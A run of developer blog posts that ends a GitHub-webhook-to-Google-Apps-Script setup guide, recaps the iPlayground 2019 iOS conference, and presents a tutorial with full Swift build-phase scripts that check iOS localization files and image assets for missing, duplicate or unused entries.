Enter Organizations / Repo -> “Settings” -> find “Webhooks” on the left -> “Add webhook”:
GAS URL
and manually add our own security verification string ?secret=githubWebhookSecret
at the end of the URL. For example, if your GAS URL
is https://script.google.com/macros/s/XXX/exec
and githubWebhookSecret
is 123456
; then the URL is: https://script.google.com/macros/s/XXX/exec?secret=123456
.application/json
Go back to the set Organizations Repo / Repo and click “Star” or un-star and then re-“Star”:
You will receive a push notification!
Done! 🎉🎉🎉🎉
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Hot participation experience of iPlayground 2019
Last year it was held in mid-October, and I also started running Medium to record my life in early October last year; combining the UUID topic I heard and the participation experience, I also wrote an article; this year I continue to write my experience to gain popularity!
iPlayground 2019 (This time it was also subsidized by the company for corporate tickets)
Compared to the first edition in 2018, this year has seen significant improvements in all aspects!
First, the venue. Last year it was in a basement conference hall, the space was small and felt oppressive, and it was not easy to use computers in the lecture rooms; this year it was held at the NTU Boya Hall, the venue was large and new, not crowded, and the classrooms had tables and sockets, making it convenient to use personal computers!
In terms of the agenda, in addition to domestic experts, this time foreign speakers were also invited to share in Taiwan; among them, the most popular was undoubtedly Wei Wang; this year also saw the first inclusion of workshops with hands-on teaching, but the spots were limited, so you had to be quick… I missed it while eating and chatting.
Sponsor booths and Ask the Speaker area were more convenient for interaction due to the larger venue and more activities; from the iChef booth #iCHEFxiPlayground I got a set of eco-friendly straws and dorayaki, from the Dcard booth I got a set of stickers and an eco-friendly cup sleeve again this year, plus a nihilistic quote wet wipe, from the 17 Live booth I filled out a questionnaire to draw Airpods 2, at the [ weak self ] Podcast booth I got stickers, and there were also booths from Grindr, CakeResume, and Bitrise to interact with. Here is a not comprehensive photo of the loot.
Incomplete Loot
Food and After Party, both days had exquisite lunch boxes, iced coffee, and tea drinks available all day without limit. However, last year had more of an After Party vibe, like listening to big names tell stories at a bar, which was very interesting. This year felt more like an afternoon tea (still had alcohol, delicious siu mai, and desserts!). We mingled on our own, but I actually made new friends this year.
Must-have for foodies, bento photo
This part resonated with me because our project does not use third-party network libraries; instead, we encapsulate methods ourselves. Many of the design patterns and issues the speaker mentioned are also areas we need to optimize and refactor. As the speaker said:
“Garbage needs to be sorted, and so does code…”
I need to go back and study this thoroughly. I will do the sorting <( _ _ )> p.s. I didn’t get the KingFisher sticker QQ
Introduced the new method UICollectionViewCompositionalLayout available in iOS ≥ 13, which allows us to avoid subclassing UICollectionViewLayout or using CollectionView Cell wrapping CollectionView to achieve complex layouts as before. This also resonated with me because our app uses the latter method to achieve the desired design style. The pinnacle was a CollectionView Cell wrapping a CollectionView, which in turn wrapped another CollectionView (three layers), making the code messy and hard to maintain. Besides introducing the structure and usage of UICollectionViewCompositionalLayout, the speaker also created a project following this model, allowing apps before iOS 12 to support the same effects — IBPCollectionViewCompositionalLayout. Amazing!
Previously wrote an article “ Let’s Make an Apple Watch App! “ based on watchOS 5 using traditional methods. Didn’t expect that now we can develop with SwiftUI! Apple Watch OS 6 supports generations 1-5, so there are fewer version issues. Practicing SwiftUI with watch apps is a good starting point (relatively simplified); will find time to revamp. p.s. Didn’t expect watchOS developers to be so marginalized QQ. Personally, I find it quite fun and hope more people can join!
Regarding the security issues of the app itself, I had never seriously studied it, with the inherent belief that “Apple is very closed and secure!” After listening to the two speakers’ presentations, I realized how fragile it is and understood the core concept of app security:
“When the cost of cracking exceeds the cost of protection, the app is secure.”
There is no guaranteed secure app, only increasing the difficulty of cracking to deter attackers!
Besides learning about the paid app Reveal, I also discovered the open-source free Lookin for viewing app UI. We often use Reveal; even if not for others, it’s convenient for debugging our own UI issues!
Additionally, regarding connection security, I recently published an article “ The app uses HTTPS transmission, but the data was still stolen. “, using mitmproxy to perform a man-in-the-middle attack by swapping the root CA. The speakers’ explanation of man-in-the-middle attacks, principles, and protection methods not only verified the correctness of my content but also deepened my understanding of this technique! It also broadened my horizons… knowing that there are jailbreak plugins that can directly intercept network requests without even needing certificate swapping.
This has also been a long-standing issue for us, the compilation is very slow; sometimes when making minor UI adjustments, it can be really frustrating. Just adjusting by 1pt, then waiting, then seeing the result, then adjusting by another 1pt, then waiting again, and then adjusting back… while(true)… It’s maddening!
The attempts and experience sharing mentioned by the speaker are really worth going back to study and applying to our own projects!
There are many other sessions (for example: things about colors A_A, I have also encountered issues with colors before)
But due to scattered notes, personal lack of related experience, or missing the session
All content can be waited for iPlayground 2019 to release the video replay (for recorded sessions), or refer to the official HackMD collaborative notes.
Besides the technical gains, I personally gained more “ soft gains “ than last year. For the first time, I met Ethan Huang in person, and while discussing the Apple Watch development ecosystem, I also unintentionally exchanged a few words with the great Cat God. Additionally, I met many new developers, colleagues Frank and George Liu’s classmate Taihsin, Spock Xue, Crystal Liu, Nia Fan, Alice, Ada, old classmate Peter Chen, old colleague Hao Ge Qiu Yuhao… and many other new friends!
yes!
More highlights can be found on Twitter #iplayground
Thanks to all the staff for their hard work and the speakers for their sharing, making these two days full of gains!
Great job! Thank you!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Introducing Localization multi-language and Image Assets missing check, using Swift to create Shell Script
Photo by Glenn Carstens-Peters
Because of my clumsiness, I often miss the “;” when editing multi-language files, causing the app to display the wrong language after building. Additionally, as development progresses, the language files become increasingly large, with repeated and unused phrases mixed together, making it very chaotic (the same situation applies to Image Assets).
I have always wanted to find a tool to help handle these issues. Previously, I used iOSLocalizationEditor, a Mac APP, but it is more like a language file editor that reads and edits language file content without automatic checking functionality.
Automatically check for errors, omissions, duplicates in multi-language files, and missing Image Assets when building the project.
To achieve our desired features, we need to add a Run Script check script in Build Phases.
However, the check script needs to be written using shell script. Since my proficiency in shell script is not very high, I thought of standing on the shoulders of giants and searching for existing scripts online but couldn’t find any that fully met the desired features. Just when I was about to give up, I suddenly thought:
Shell Script can be written in Swift!
Compared to shell script, I am more familiar and proficient with Swift! Following this direction, I indeed found two existing tool scripts!
Two checking tools written by the freshOS team:
They fully meet our desired feature requirements! And since they are written in Swift, customizing and modifying them is very easy.
Features:
Installation Method:
${SRCROOT}/Localize.swift
${SRCROOT}/Localize.swift
Localize.swift
file for configuration. You can see the configurable items in the upper part of the file: ```swift // Enable the check script let enabled = true// Localization file directory let relativeLocalizableFolders = “/Resources/Languages”
// Project directory (used to search if the phrases are used in the code) let relativeSourceFolder = “/Sources”
// Regular expression patterns for NSLocalized phrases in the code // You can add your own without changing the existing ones let patterns = [ “NSLocalized(Format)?String\(\s@?"([\w\.]+)"”, // Swift and Objc Native “Localizations\.((?:[A-Z]{1}[a-z][A-z])(?:\.[A-Z]{1}[a-z][A-z]))”, // Laurine Calls “L10n.tr\(key: "(\w+)"”, // SwiftGen generation “ypLocalized\("(.)"\)”, “"(.*)".localized” // “key”.localized pattern ]
// Phrases to ignore for “unused phrase warning” let ignoredFromUnusedKeys: [String] = [] /* example let ignoredFromUnusedKeys = [ “NotificationNoOne”, “NotificationCommentPhoto”, “NotificationCommentHisPhoto”, “NotificationCommentHerPhoto” ] */
// Main language let masterLanguage = “en”
// Enable a-z sorting and organizing functionality for localization files let sanitizeFiles = false
// Is the project single or multi-language let singleLanguage = false
// Enable check for untranslated phrases let checkForUntranslated = true
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+
+5. Build! Success!
+
+
+
+**Check result prompt types:**
+- **Build Error** ❌ **:**
+ - \[Duplication\] The item is duplicated in the localization file
+ - \[Unused Key\] The item is defined in the localization file but not used in the actual code
+ - \[Missing\] The item is used in the actual code but not defined in the localization file
+ - \[Redundant\] The item is redundant in this localization file compared to the main localization file
+ - \[Missing Translation\] The item exists in the main localization file but is missing in this localization file
+- **Build Warning** ⚠️ **:**
+ - \[Potentially Untranslated\] This item is untranslated (same content as the main localization file)
+
+> **_Not done yet, now we have automatic check prompts, but we still need to customize a bit._**
+
+**Custom regular expression matching:**
+
+Looking back at the patterns section in the top configuration block of the check script `Localize.swift`:
+
+`"NSLocalized(Format)?String\\(\\s*@?\"([\\w\\.]+)\""`
+
+This matches the `NSLocalizedString()` method in Swift/ObjC, but this regular expression can only match phrases like `"Home.Title"`. If we have full sentences or phrases with format parameters, they will be mistakenly marked as \[Unused Key\].
+
+EX: `"Hi, %@ welcome to my app", "Hello World!"` **<- These phrases cannot be matched**
+
+We can add a new pattern setting or change the original pattern to:
+
+`"NSLocalized(Format)?String\\(\\s*@?\"([^(\")]+)\""`
+
+The main adjustment is to match any string until the `"` appears, stopping there. You can also [click here](https://rubular.com/r/5eXvGy3svsAHyT){:target="_blank"} to customize according to your needs.
+
+**Add Language File Format Check Functionality:**
+
+This script only checks the content of language files for correspondence and does not check if the file format is correct (whether a ";" is missing). If you need this functionality, you need to add it yourself!
+```swift
+//....
+let formatResult = shell("plutil -lint \(location)")
+guard formatResult.trimmingCharacters(in: .whitespacesAndNewlines).suffix(2) == "OK" else {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:1: "
+ + "error: [File Invalid] "
+ + "This Localizable.strings file format is invalid."
+ print(str)
+ numberOfErrors += 1
+ return
+}
+//....
+
+func shell(_ command: String) -> String {
+ let task = Process()
+ let pipe = Pipe()
+
+ task.standardOutput = pipe
+ task.arguments = ["-c", command]
+ task.launchPath = "/bin/bash"
+ task.launch()
+
+ let data = pipe.fileHandleForReading.readDataToEndOfFile()
+ let output = String(data: data, encoding: .utf8)!
+
+ return output
+}
+
Add shell()
to execute shell scripts, using plutil -lint
to check the correctness of the plist language file format. If there are errors or missing “;”, it will return an error; if there are no errors, it will return OK
as the judgment!
The check can be added after LocalizationFiles->process( )-> let location = singleLanguage…
, around line 135, or refer to the complete modified version I provided at the end.
Other Customizations:
We can customize according to our needs, such as changing error to warning or removing a certain check function (EX: Potentially Untranslated, Unused Key); the script is in Swift, which we are all familiar with! No fear of breaking or making mistakes!
To show Error ❌ during build:
1
+
print("ProjectFile.lproj" + "/File:Line: " + "error: ErrorMessage")
+
To show Warning ⚠️ during build:
1
+
print("ProjectFile.lproj" + "/File:Line: " + "warning: WarningMessage")
+
Final Modified Version:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+127
+128
+129
+130
+131
+132
+133
+134
+135
+136
+137
+138
+139
+140
+141
+142
+143
+144
+145
+146
+147
+148
+149
+150
+151
+152
+153
+154
+155
+156
+157
+158
+159
+160
+161
+162
+163
+164
+165
+166
+167
+168
+169
+170
+171
+172
+173
+174
+175
+176
+177
+178
+179
+180
+181
+182
+183
+184
+185
+186
+187
+188
+189
+190
+191
+192
+193
+194
+195
+196
+197
+198
+199
+200
+201
+202
+203
+204
+205
+206
+207
+208
+209
+210
+211
+212
+213
+214
+215
+216
+217
+218
+219
+220
+221
+222
+223
+224
+225
+226
+227
+228
+229
+230
+231
+232
+233
+234
+235
+236
+237
+238
+239
+240
+241
+242
+243
+244
+245
+246
+247
+248
+249
+250
+251
+252
+253
+254
+255
+256
+257
+258
+259
+260
+261
+262
+263
+264
+265
+266
+267
+268
+269
+270
+271
+272
+273
+274
+275
+276
+277
+278
+279
+280
+281
+282
+283
+284
+285
+286
+287
+288
+289
+290
+291
+292
+293
+294
+295
+296
+297
+298
+299
+300
+301
+302
+303
+304
+305
+306
+307
+308
+309
+310
+311
+312
+313
+314
+315
+316
+317
+318
+319
+320
+321
+322
+323
+324
+325
+326
+327
+328
+329
+330
+331
+332
+333
+334
+335
+336
+337
+338
+339
+340
+341
+342
+343
+344
+345
+
#!/usr/bin/env xcrun --sdk macosx swift
+
+import Foundation
+
+// WHAT
+// 1. Find Missing keys in other Localisation files
+// 2. Find potentially untranslated keys
+// 3. Find Duplicate keys
+// 4. Find Unused keys and generate script to delete them all at once
+
+// MARK: Start Of Configurable Section
+
+/*
+ You can enable or disable the script whenever you want
+ */
+let enabled = true
+
+/*
+ Put your path here, example -> Resources/Localizations/Languages
+ */
+let relativeLocalizableFolders = "/streetvoice/SupportingFiles"
+
+/*
+ This is the path of your source folder which will be used in searching
+ for the localization keys you actually use in your project
+ */
+let relativeSourceFolder = "/streetvoice"
+
+/*
+ Those are the regex patterns to recognize localizations.
+ */
+let patterns = [
+ "NSLocalized(Format)?String\\(\\s*@?\"([^(\")]+)\"", // Swift and Objc Native
+ "Localizations\\.((?:[A-Z]{1}[a-z]*[A-z]*)*(?:\\.[A-Z]{1}[a-z]*[A-z]*)*)", // Laurine Calls
+ "L10n.tr\\(key: \"(\\w+)\"", // SwiftGen generation
+ "ypLocalized\\(\"(.*)\"\\)",
+ "\"(.*)\".localized" // "key".localized pattern
+]
+
+/*
+ Those are the keys you don't want to be recognized as "unused"
+ For instance, Keys that you concatenate will not be detected by the parsing
+ so you want to add them here in order not to create false positives :)
+ */
+let ignoredFromUnusedKeys: [String] = []
+/* example
+let ignoredFromUnusedKeys = [
+ "NotificationNoOne",
+ "NotificationCommentPhoto",
+ "NotificationCommentHisPhoto",
+ "NotificationCommentHerPhoto"
+]
+*/
+
+let masterLanguage = "base"
+
+/*
+ Sanitizing files will remove comments, empty lines and order your keys alphabetically.
+ */
+let sanitizeFiles = false
+
+/*
+ Determines if there are multiple localizations or not.
+ */
+let singleLanguage = false
+
+/*
+ Determines if we should show errors if there's a key within the app
+ that does not appear in master translations.
+*/
+let checkForUntranslated = false
+
+// MARK: End Of Configurable Section
+
+if enabled == false {
+ print("Localization check cancelled")
+ exit(000)
+}
+
+// Detect list of supported languages automatically
+func listSupportedLanguages() -> [String] {
+ var sl: [String] = []
+ let path = FileManager.default.currentDirectoryPath + relativeLocalizableFolders
+ if !FileManager.default.fileExists(atPath: path) {
+ print("Invalid configuration: \(path) does not exist.")
+ exit(1)
+ }
+ let enumerator = FileManager.default.enumerator(atPath: path)
+ let extensionName = "lproj"
+ print("Found these languages:")
+ while let element = enumerator?.nextObject() as? String {
+ if element.hasSuffix(extensionName) {
+ print(element)
+ let name = element.replacingOccurrences(of: ".\(extensionName)", with: "")
+ sl.append(name)
+ }
+ }
+ return sl
+}
+
+let supportedLanguages = listSupportedLanguages()
+var ignoredFromSameTranslation: [String: [String]] = [:]
+let path = FileManager.default.currentDirectoryPath + relativeLocalizableFolders
+var numberOfWarnings = 0
+var numberOfErrors = 0
+
+struct LocalizationFiles {
+ var name = ""
+ var keyValue: [String: String] = [:]
+ var linesNumbers: [String: Int] = [:]
+
+ init(name: String) {
+ self.name = name
+ process()
+ }
+
+ mutating func process() {
+ if sanitizeFiles {
+ removeCommentsFromFile()
+ removeEmptyLinesFromFile()
+ sortLinesAlphabetically()
+ }
+ let location = singleLanguage ? "\(path)/Localizable.strings" : "\(path)/\(name).lproj/Localizable.strings"
+
+ let formatResult = shell("plutil -lint \(location)")
+ guard formatResult.trimmingCharacters(in: .whitespacesAndNewlines).suffix(2) == "OK" else {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:1: "
+ + "error: [File Invalid] "
+ + "This Localizable.strings file format is invalid."
+ print(str)
+ numberOfErrors += 1
+ return
+ }
+
+ guard let string = try? String(contentsOfFile: location, encoding: .utf8) else {
+ return
+ }
+
+ let lines = string.components(separatedBy: .newlines)
+ keyValue = [:]
+
+ let pattern = "\"(.*)\" = \"(.+)\";"
+ let regex = try? NSRegularExpression(pattern: pattern, options: [])
+ var ignoredTranslation: [String] = []
+
+ for (lineNumber, line) in lines.enumerated() {
+ let range = NSRange(location: 0, length: (line as NSString).length)
+
+ // Ignored pattern
+ let ignoredPattern = "\"(.*)\" = \"(.+)\"; *\\/\\/ *ignore-same-translation-warning"
+ let ignoredRegex = try? NSRegularExpression(pattern: ignoredPattern, options: [])
+ if let ignoredMatch = ignoredRegex?.firstMatch(in: line,
+ options: [],
+ range: range) {
+ let key = (line as NSString).substring(with: ignoredMatch.range(at: 1))
+ ignoredTranslation.append(key)
+ }
+
+ if let firstMatch = regex?.firstMatch(in: line, options: [], range: range) {
+ let key = (line as NSString).substring(with: firstMatch.range(at: 1))
+ let value = (line as NSString).substring(with: firstMatch.range(at: 2))
+
+ if keyValue[key] != nil {
+ let str = "\(path)/\(name).lproj"
+ + "/Localizable.strings:\(linesNumbers[key]!): "
+ + "error: [Duplication] \"\(key)\" "
+ + "is duplicated in \(name.uppercased()) file"
+ print(str)
+ numberOfErrors += 1
+ } else {
+ keyValue[key] = value
+ linesNumbers[key] = lineNumber + 1
+ }
+ }
+ }
+ print(ignoredFromSameTranslation)
+ ignoredFromSameTranslation[name] = ignoredTranslation
+ }
+
+ func rebuildFileString(from lines: [String]) -> String {
+ return lines.reduce("") { (r: String, s: String) -> String in
+ (r == "") ? (r + s) : (r + "\n" + s)
+ }
+ }
+
+ func removeEmptyLinesFromFile() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ var lines = string.components(separatedBy: .newlines)
+ lines = lines.filter { $0.trimmingCharacters(in: .whitespaces) != "" }
+ let s = rebuildFileString(from: lines)
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func removeCommentsFromFile() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ var lines = string.components(separatedBy: .newlines)
+ lines = lines.filter { !$0.hasPrefix("//") }
+ let s = rebuildFileString(from: lines)
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func sortLinesAlphabetically() {
+ let location = "\(path)/\(name).lproj/Localizable.strings"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ let lines = string.components(separatedBy: .newlines)
+
+ var s = ""
+ for (i, l) in sortAlphabetically(lines).enumerated() {
+ s += l
+ if i != lines.count - 1 {
+ s += "\n"
+ }
+ }
+ try? s.write(toFile: location, atomically: false, encoding: .utf8)
+ }
+ }
+
+ func removeEmptyLinesFromLines(_ lines: [String]) -> [String] {
+ return lines.filter { $0.trimmingCharacters(in: .whitespaces) != "" }
+ }
+
+ func sortAlphabetically(_ lines: [String]) -> [String] {
+ return lines.sorted()
+ }
+}
+
+// MARK: - Load Localisation Files in memory
+
+let masterLocalizationFile = LocalizationFiles(name: masterLanguage)
+let localizationFiles = supportedLanguages
+ .filter { $0 != masterLanguage }
+ .map { LocalizationFiles(name: $0) }
+
+// MARK: - Detect Unused Keys
+
+let sourcesPath = FileManager.default.currentDirectoryPath + relativeSourceFolder
+let fileManager = FileManager.default
+let enumerator = fileManager.enumerator(atPath: sourcesPath)
+var localizedStrings: [String] = []
+while let swiftFileLocation = enumerator?.nextObject() as? String {
+ // checks the extension
+ if swiftFileLocation.hasSuffix(".swift") || swiftFileLocation.hasSuffix(".m") || swiftFileLocation.hasSuffix(".mm") {
+ let location = "\(sourcesPath)/\(swiftFileLocation)"
+ if let string = try? String(contentsOfFile: location, encoding: .utf8) {
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location: 0, length: (string as NSString).length) // Obj c wa
+ regex?.enumerateMatches(in: string,
+ options: [],
+ range: range,
+ using: { result, _, _ in
+ if let r = result {
+ let value = (string as NSString).substring(with: r.range(at: r.numberOfRanges - 1))
+ localizedStrings.append(value)
+ }
+ })
+ }
+ }
+ }
+}
+
+var masterKeys = Set(masterLocalizationFile.keyValue.keys)
+let usedKeys = Set(localizedStrings)
+let ignored = Set(ignoredFromUnusedKeys)
+let unused = masterKeys.subtracting(usedKeys).subtracting(ignored)
+let untranslated = usedKeys.subtracting(masterKeys)
+
+// Here generate Xcode regex Find and replace script to remove dead keys all at once!
+var replaceCommand = "\"("
+var counter = 0
+for v in unused {
+ var str = "\(path)/\(masterLocalizationFile.name).lproj/Localizable.strings:\(masterLocalizationFile.linesNumbers[v]!): "
+ str += "error: [Unused Key] \"\(v)\" is never used"
+ print(str)
+ numberOfErrors += 1
+ if counter != 0 {
+ replaceCommand += "|"
+ }
+ replaceCommand += v
+ if counter == unused.count - 1 {
+ replaceCommand += ")\" = \".*\";"
+ }
+ counter += 1
+}
+
+print(replaceCommand)
+
+// MARK: - Compare each translation file against master (en)
+
+for file in localizationFiles {
+ for k in masterLocalizationFile.keyValue.keys {
+ if file.keyValue[k] == nil {
+ var str = "\(path)/\(file.name).lproj/Localizable.strings:\(masterLocalizationFile.linesNumbers[k]!): "
+ str += "error: [Missing] \"\(k)\" missing from \(file.name.uppercased()) file"
+ print(str)
+ numberOfErrors += 1
+ }
+ }
+
+ let redundantKeys = file.keyValue.keys.filter { !masterLocalizationFile.keyValue.keys.contains($0) }
+
+ for k in redundantKeys {
+ let str = "\(path)/\(file.name).lproj/Localizable.strings:\(file.linesNumbers[k]!): "
+ + "error: [Redundant key] \"\(k)\" redundant in \(file.name.uppercased()) file"
+
+ print(str)
+ }
+}
+
+if checkForUntranslated {
+ for key in untranslated {
+ var str = "\(path)/\(masterLocalizationFile.name).lproj/Localizable.strings:1: "
+ str += "error: [Missing Translation] \(key) is not translated"
+
+ print(str)
+ numberOfErrors += 1
+ }
+}
+
+print("Number of warnings : \(numberOfWarnings)")
+print("Number of errors : \(numberOfErrors)")
+
+if numberOfErrors > 0 {
+ exit(1)
+}
+
+func shell(_ command: String) -> String {
+ let task = Process()
+ let pipe = Pipe()
+
+ task.standardOutput = pipe
+ task.arguments = ["-c", command]
+ task.launchPath = "/bin/bash"
+ task.launch()
+
+ let data = pipe.fileHandleForReading.readDataToEndOfFile()
+ let output = String(data: data, encoding: .utf8)!
+
+ return output
+}
+
Finally, it’s not over yet!
When our Swift check tool script is fully debugged, we need to compile it into an executable to reduce build time. Otherwise, it will need to be recompiled every time we build (this can reduce the time by about 90%).
Open the terminal and navigate to the directory where the check tool script is located in the project, then execute:
1
+
swiftc -o Localize Localize.swift
+
Then go back to Build Phases and change the Script content path to the executable
EX: ${SRCROOT}/Localize
Done!
Features:
Installation Method:
${SRCROOT}/AssetChecker.swift
1
+2
+
${SRCROOT}/AssetChecker.swift ${SRCROOT}/project_directory ${SRCROOT}/Resources/Images.xcassets
+//${SRCROOT}/Resources/Images.xcassets = the location of your .xcassets
+
You can directly set the parameters in the path, parameter 1: project directory location, parameter 2: image resource directory location; or edit the AssetChecker.swift
top parameter setting block like the localization check tool:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
// Configure me \o/
+
+// Project directory location (used to search if images are used in the code)
+var sourcePathOption:String? = nil
+
+// .xcassets directory location
+var assetCatalogPathOption:String? = nil
+
+// Unused warning ignore items
+let ignoredUnusedNames = [String]()
+
Check Result Prompt Types:
ignoredUnusedNames
as an exception.Other operations are the same as the localization check tool, so they won’t be repeated here; the most important thing is to remember to compile it into an executable after debugging and change the run script content to the executable!
We can refer to the image resource check tool script:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+99
+100
+101
+102
+103
+104
+105
+106
+107
+108
+109
+110
+111
+112
+113
+114
+115
+116
+117
+118
+119
+120
+121
+122
+123
+124
+125
+126
+
#!/usr/bin/env xcrun --sdk macosx swift
+
+import Foundation
+
+// Configure me \o/
+var sourcePathOption:String? = nil
+var assetCatalogPathOption:String? = nil
+let ignoredUnusedNames = [String]()
+
+for (index, arg) in CommandLine.arguments.enumerated() {
+ switch index {
+ case 1:
+ sourcePathOption = arg
+ case 2:
+ assetCatalogPathOption = arg
+ default:
+ break
+ }
+}
+
+guard let sourcePath = sourcePathOption else {
+ print("AssetChecker:: error: Source path was missing!")
+ exit(0)
+}
+
+guard let assetCatalogAbsolutePath = assetCatalogPathOption else {
+ print("AssetChecker:: error: Asset Catalog path was missing!")
+ exit(0)
+}
+
+print("Searching sources in \(sourcePath) for assets in \(assetCatalogAbsolutePath)")
+
+/* Put here the asset generating false positives,
+ For instance when you build asset names at runtime
+let ignoredUnusedNames = [
+ "IconArticle",
+ "IconMedia",
+ "voteEN",
+ "voteES",
+ "voteFR"
+]
+*/
+
+// MARK : - End Of Configurable Section
+func elementsInEnumerator(_ enumerator: FileManager.DirectoryEnumerator?) -> [String] {
+ var elements = [String]()
+ while let e = enumerator?.nextObject() as? String {
+ elements.append(e)
+ }
+ return elements
+}
+
+// MARK: - List Assets
+func listAssets() -> [String] {
+ let extensionName = "imageset"
+ let enumerator = FileManager.default.enumerator(atPath: assetCatalogAbsolutePath)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(extensionName) } // Is Asset
+ .map { $0.replacingOccurrences(of: ".\(extensionName)", with: "") } // Remove extension
+ .map { $0.components(separatedBy: "/").last ?? $0 } // Remove folder path
+}
+
+// MARK: - List Used Assets in the codebase
+func localizedStrings(inStringFile: String) -> [String] {
+ var localizedStrings = [String]()
+ let namePattern = "([\\w-]+)"
+ let patterns = [
+ "#imageLiteral\\(resourceName: \"\(namePattern)\"\\)", // Image Literal
+ "UIImage\\(named:\\s*\"\(namePattern)\"\\)", // Default UIImage call (Swift)
+ "UIImage imageNamed:\\s*\\@\"\(namePattern)\"", // Default UIImage call
+ "\\<image name=\"\(namePattern)\".*", // Storyboard resources
+ "R.image.\(namePattern)\\(\\)" //R.swift support
+ ]
+ for p in patterns {
+ let regex = try? NSRegularExpression(pattern: p, options: [])
+ let range = NSRange(location:0, length:(inStringFile as NSString).length)
+ regex?.enumerateMatches(in: inStringFile,options: [], range: range) { result, _, _ in
+ if let r = result {
+ let value = (inStringFile as NSString).substring(with:r.range(at: 1))
+ localizedStrings.append(value)
+ }
+ }
+ }
+ return localizedStrings
+}
+
+func listUsedAssetLiterals() -> [String] {
+ let enumerator = FileManager.default.enumerator(atPath:sourcePath)
+ print(sourcePath)
+
+ #if swift(>=4.1)
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .compactMap{$0}
+ .compactMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #else
+ return elementsInEnumerator(enumerator)
+ .filter { $0.hasSuffix(".m") || $0.hasSuffix(".swift") || $0.hasSuffix(".xib") || $0.hasSuffix(".storyboard") } // Only Swift and Obj-C files
+ .map { "\(sourcePath)/\($0)" } // Build file paths
+ .map { try? String(contentsOfFile: $0, encoding: .utf8)} // Get file contents
+ .flatMap{$0}
+ .flatMap{$0} // Remove nil entries
+ .map(localizedStrings) // Find localizedStrings occurrences
+ .flatMap{$0} // Flatten
+ #endif
+}
+
+// MARK: - Beginning of script
+let assets = Set(listAssets())
+let used = Set(listUsedAssetLiterals() + ignoredUnusedNames)
+
+// Generate Warnings for Unused Assets
+let unused = assets.subtracting(used)
+unused.forEach { print("\(assetCatalogAbsolutePath):: warning: [Asset Unused] \($0)") }
+
+// Generate Error for broken Assets
+let broken = used.subtracting(assets)
+broken.forEach { print("\(assetCatalogAbsolutePath):: error: [Asset Missing] \($0)") }
+
+if broken.count > 0 {
+ exit(1)
+}
+
Compared to the language check script, this script is concise and has all the important functions, making it very valuable for reference!
P.S. You can see the code has the localizedStrings()
naming, suspecting the author borrowed the logic from the language check tool and forgot to change the method name XD
Example:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+
for (index, arg) in CommandLine.arguments.enumerated() {
+ switch index {
+ case 1:
+ // Parameter 1
+ case 2:
+ // Parameter 2
+ default:
+ break
+ }
+}
+
^ Method to receive external parameters
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+
func elementsInEnumerator(_ enumerator: FileManager.DirectoryEnumerator?) -> [String] {
+ var elements = [String]()
+ while let e = enumerator?.nextObject() as? String {
+ elements.append(e)
+ }
+ return elements
+}
+
+func localizedStrings(inStringFile: String) -> [String] {
+ var localizedStrings = [String]()
+ let namePattern = "([\\w-]+)"
+ let patterns = [
+ "#imageLiteral\\(resourceName: \"\(namePattern)\"\\)", // Image Literal
